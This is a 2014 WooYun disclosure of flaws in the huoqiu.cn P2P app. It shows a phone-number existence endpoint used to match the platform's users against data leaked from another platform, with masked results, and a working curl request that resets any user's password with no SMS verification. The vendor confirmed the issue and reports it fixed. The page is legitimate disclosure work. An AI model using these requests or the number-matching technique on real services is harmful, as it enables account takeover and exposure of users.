当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082201

漏洞标题:火球网APP设计缺陷可导致任意用户密码重置附官方百万余额账户演示

相关厂商:huoqiu.cn

漏洞作者: 秋风

提交时间:2014-11-06 08:38

修复时间:2014-12-21 08:42

公开时间:2014-12-21 08:42

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-06: 细节已通知厂商并且等待厂商处理中
2014-11-06: 厂商已经确认,细节仅向厂商公开
2014-11-16: 细节向核心白帽子及相关领域专家公开
2014-11-26: 细节向普通白帽子公开
2014-12-06: 细节向实习白帽子公开
2014-12-21: 细节向公众公开

简要描述:

我有一只小毛驴,我从来也不骑。有一天我心血来潮骑着去赶集。我手里拿着小皮鞭我心里正得意。不知怎么哗啦啦啦啦啦,我摔了一身泥。

详细说明:

#0 手机号碰撞

接口地址
https://www.huoqiu.cn/mobile/login/phone/is_exist.json?phoneNum=13800138000&md5str=e2009584715d2bc28ec13251867ea066&csrf_time=1415197219841&hq_phone=true
如果手机号不存在,返回json数据为
{"is_exist":false,"success":true}
如果手机号存在,返回json数据为
{"is_exist":true,"success":true}
拿某P2P平台数据做碰撞,贴出部分碰撞到手机号,这些用户是不是你们的,可自查,碰撞过程在这就不做演示了!
***********
137
mask 区域
*****14*****

60*
18

mask 区域
*****03*****

6*
18

mask 区域
*****30*****

45*
139

mask 区域
*****61*****

0*
135

mask 区域
*****52*****

1*
15

mask 区域
*****45*****

15*
15

mask 区域
*****61*****

0*
13

mask 区域
*****18*****

8*
15

mask 区域
*****20*****

51*
13

mask 区域
*****45*****

14*
18

mask 区域
*****15*****

20*
134

mask 区域
*****89*****

56*
18

mask 区域
*****43*****

92*
13

mask 区域
*****93*****

55*
18

mask 区域
*****28*****

054*
186

mask 区域
*****95*****

1*
15

mask 区域
*****38*****

94*

mask 区域
*****39*****

3317*
1

mask 区域
*****99*****

3615*
18

mask 区域
*****15*****

394*
***********


#1 重置用户密码接口

接口地址
https://www.huoqiu.cn/mobile/app/login_pwd/reset.json?cell=1338116****&password=123456&passwordRepeated=123456&md5str=dc17b75b4ab7ad5273dcf1396fbaeee3&csrf_time=1415195091957&hq_phone=true
GET必要参数说明
cell->用户手机号码
password->用户新密码
passwordRepeated->确认密码
后边几项存在越权,随便拿个账号自己去重置下密码,抓包保存即可,可复用。
curl "https://www.huoqiu.cn/mobile/app/login_pwd/reset.json?cell=1338*******&password=123456&passwordRepeated=123456&md5str=dc17b75b4ab7ad5273dcf1396fbaeee3&csrf_time=1415195091957&hq_phone=true" --data ""
如重置成功,服务器将返回:{"message":"修改登录密码成功","retcode":0,"success":true}

漏洞证明:

t1.png


06012256acb2f5f785c1526319dfc57dde8c4427.png


06012816c26ab45997efd65249c96c002fbeb345.jpg

修复方案:

说好的手机验证码呢?咋在这一步就玩儿丢了?土豪,我们做朋友可好?

版权声明:转载请注明来源 秋风@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-11-06 11:23

厂商回复:

部分用户可能会受到影响。已暂停该功能,将尽快修复。感谢!

最新状态:

2014-11-06:已经修复.


漏洞评价:

评论

  1. 2014-11-13 11:30 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    看了漏洞简介,竟然情不自禁的唱出来了。